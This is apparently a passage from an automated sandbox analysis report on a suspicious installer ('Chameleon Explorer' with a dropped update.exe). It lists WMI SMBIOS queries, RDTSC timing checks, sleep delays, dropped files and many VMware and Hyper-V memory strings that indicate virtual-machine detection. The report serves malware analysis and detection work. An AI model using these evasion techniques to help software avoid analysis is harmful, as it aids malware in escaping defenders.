                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Users\user\AppData\Roaming\update.exe | RDTSC instruction interceptor: First address: 46B29E second address: 46B29E instructions: 0x00000000 rdtsc 0x00000002 test dl, 00000022h 0x00000005 test ch, 00000000h 0x00000008 test dh, ah 0x0000000a cmp ecx, 00FFFFFFh 0x00000010 jne 00007F12085027D2h 0x00000012 cmp dx, cx 0x00000015 test edx, edx 0x00000017 test eax, ecx 0x00000019 inc ecx 0x0000001a test edx, eax 0x0000001c cmp al, dl 0x0000001e test ah, ah 0x00000020 rdtsc
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Window / User API: threadDelayed 1777
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Window / User API: threadDelayed 7812
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Window / User API: threadDelayed 461
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmp
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-614
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe | API coverage: 7.0 %
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | API coverage: 8.7 %
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe TID: 3940 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe TID: 6428 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 5180 | Thread sleep time: -177700s >= -30000s
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 5180 | Thread sleep time: -781200s >= -30000s
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe TID: 1004 | Thread sleep time: -46100s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\update.exe TID: 6352 | Thread sleep count: 90 > 30
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Last function: Thread delayed
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Last function: Thread delayed
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Code function: 2_2_0355A504 FindFirstFileW,FindClose,2_2_0355A504
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Code function: 2_2_03559F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,2_2_03559F38
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 16_2_0295A504 FindFirstFileW,16_2_0295A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 17_2_029DA504 FindFirstFileW,17_2_029DA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 18_2_029AA504 FindFirstFileW,18_2_029AA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 19_2_02A7A504 FindFirstFileW,19_2_02A7A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Code function: 20_2_03330280 FindFirstFileW,FindClose,20_2_03330280
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004099C0 FreeLibrary,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,RemoveDirectoryW,21_2_004099C0
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00413030 FindFirstFileW,FindNextFileW,FindClose,21_2_00413030
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,21_2_004119A8
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004119AC FindFirstFileW,FindNextFileW,FindClose,21_2_004119AC
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,21_2_00412D6C
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_0041160C FindFirstFileW,FindNextFileW,FindClose,21_2_0041160C
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 22_2_02A1A504 FindFirstFileW,22_2_02A1A504
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0355AFF0 GetSystemInfo,2_2_0355AFF0
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2908784857.0000000006BD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976669015.00000000016BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F6F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.NoneNo Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..........
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 3 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2027394233.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2416967667.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2339435855.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2295184572.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2009801141.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2279481529.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2310511961.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2869116933.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2347842084.0000000003F82000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2374339256.0000000003F82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWr
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2592944717.00000000052EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW2
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2165295650.000000000523D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2600737948.00000000052DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1971592838.00000000016C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.No
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2801035083.000000000530E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: (2 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2373876593.0000000005291000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.208292
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.2211211842u
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2713353775.000000000530E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2610909014.00000000052F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VM
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2784063600.000000000535E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2516389611.00000000052C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.0
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d9 3b f0VMware20,1
                    Source: ChameleonFolder.exe, 0000000B.00000002.2929217475.0000000000C73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2622200268.00000000052E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f#
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwarey
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2462942211.0000000005291000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.22112118
                    Source: ChameleonExplorer.exe, 00000004.00000003.1812504179.0000000003D53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMware20,1api32.dll
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2766996554.0000000005317000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, In
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2934722928.00000000016B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW07
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2298878608.000000000526D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2004143273.00000000051F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMwa
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2668005016.00000000052E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMwar_
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f0.VMware
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2915061860.0000000006BD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2513311449.00000000052B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMwarey
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2876513835.0000000006BD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2792234245.000000000535C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2465984831.0000000005283000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareX
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2236334515.0000000005241000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2960846322.00000000051F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1898682933.000000000303D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/20220
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2124478117.00000000051F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F6F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None
                    Source: ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003D5C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #6r
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2603877422.00000000052EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2655862972.0000000005340000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae
                    Source: ChameleonExplorer.exe, 00000004.00000003.1778603692.0000000003D04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: re-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022......
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022....NVD slot #26.NVD slot #26...Tt.................................................................................NVD slot #27.NVD slot #27...Tu.................................................................................NVD slot #28.NVD slot #28...Tv.................................................................................NVD slot #29.NVD slot #29...Tw.................................................................................NVD slot #30.NVD slot #30...Tx.................................................................................NVD slot #31.NVD slot #31...Ty.................................................................................NVD slot #32.NVD slot #32...Tz.................................................................................NVD slot #33.NVD slot #33...T{.................................................................................NVD slot #34.NVD slot #34...T|.................................................................................NVD slot #35.NVD slot #35...T}.................................................................................NVD slot #36.NVD slot #36...T~.................................................................................NVD slot #37.NVD slot #37...T..................................................................................NVD slot #38.NVD slot #38...T..................................................................................NVD slot #39.NVD slot #39...T..................................................................................NVD slot #40.NVD slot #40...T..................................................................................NVD slot #41.NVD slot #41...T..................................................................................NVD slot #42.NVD slot #42...T..................................................................................NVD slot #43.NVD slot #43...T..................................................................................NVD slot #44.NVD slot #44...T..................................................................................NVD slot #45.NVD slot #45...T..................................................................................NVD slot #46.NVD slot #46...T..................................................................................NVD slot #47.NVD slot #47...T..................................................................................NVD slot #48.NVD slot #48...T..................................................................................NVD slot #49.NVD slot #49...T..................................................................................NVD slot #50.NVD slot #50...T..................................................................................NVD slot #51.NVD slot #51...T..................................................................................NVD slot #52.NVD slot #52...T........................
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2682002936.00000000052DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2773686051.0000000006B97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES137
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1973013811.00000000016BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d
